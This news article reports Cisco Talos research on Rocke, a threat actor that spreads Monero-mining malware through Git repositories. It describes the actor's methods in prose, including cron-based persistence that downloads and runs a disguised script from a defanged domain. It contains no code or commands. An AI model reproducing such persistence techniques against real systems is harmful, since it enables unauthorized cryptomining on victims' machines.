Rocke threat actor on Monero cryptominer infection campaign

News by Robert Abel

Despite market volatility, Cisco Talos researchers have noticed falling cryptocurrency prices have had little to no effect on cryptomining malware campaigns.

Despite market volatility, Cisco Talos researchers have noticed falling cryptocurrency prices have had little to no effect on cryptomining malware campaigns.

Researchers are warning users of a Chinese-language threat actor named Rocke who has been leveraging Git repositories to infect systems with Monero-mining malware, according to an 30 August blog post.

Rocke has been on their radar since April 2018 when they began leveraging both Western and Chinese Git repositories to deliver malware to honeypot systems vulnerable to an Apache Struts vulnerability. Most recently, researchers have spotted the same threat actor engaging in another similar campaign in which allowed them more insight into Rocke's methods.

The threat actors actively engage in distributing and executing their malware using various repositories and payloads, along with shell scripts, JavaScript backdoors and ELF and PE miners, researchers said. Rocke also sells a US$ 14 (£11) Monero Silent miner which is advertised as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into "Windows processes to bypass firewalls."

"Once the threat actor had compromised a system, they achieved persistence on the device by installing a cron job that downloads and executes a file "logo.jpg" from "3389[.]space," researchers said in the post. "

"This file is a shell script which, in turn, downloads mining executables from the threat actor's Git repositories and saves them under the filename "java." The exact file downloaded depends on the victim's system architecture. Similarly, the system architecture determines if "h32" or "h64" is used to invoke "java."

The miner's payload appears to be similar to the one used by the Iron Cybercrime Group as they both behave similarly and reach out to similar infrastructure, researchers noted.

Rocke has also been spotted attempting to access cloud storage series and manuals for programming in Chinese Easy language. Researchers suspect Rocke will continue to leverage Git repositories to download and execute illicit mining onto victim machine and will also likely carry out social engineering attacks as a new infection vector.

Find this article useful?

Get more great articles like this in your inbox every lunchtime

Upcoming event